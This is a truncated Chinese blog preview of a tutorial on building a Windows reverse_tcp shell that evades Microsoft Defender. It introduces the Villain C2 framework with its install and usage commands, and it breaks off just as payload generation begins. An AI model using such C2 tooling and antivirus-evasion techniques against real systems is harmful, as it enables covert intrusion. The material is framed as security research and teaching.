打造绕过Defender的Windows reverse_tcp Shell【部分】

文章预览

声明： 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 博客新域名： https://gugesay.com 不想错过任何消息？设置星标 ↓ ↓ ↓ Villain 关于Villain Villain 是一个高级 Stage 0/1 C2 框架，可以处理多个基于 TCP 套接字和 HoaxShell 的反弹 Shell，通过附加功能（命令、实用程序）增强其功能，并在连接的同级服务器（在不同机器上运行的 Villain 实例）之间共享它们。 项目地址：https://github.com/t3l3machus/Villain 安装 apt install villain Villain 使用示例 villain [-h] [-p PORT] [-x HOAX_PORT] [-n NETCAT_PORT] [-f FILE_SMUGGLER_PORT] [-i] [-c CERTFILE] [-k KEYFILE] [-u] [-q] Defender检测绕过 首先使用Villain生成payload，以Windows PowerShell为例： Villain  > generate payload=windows/ne ………………………………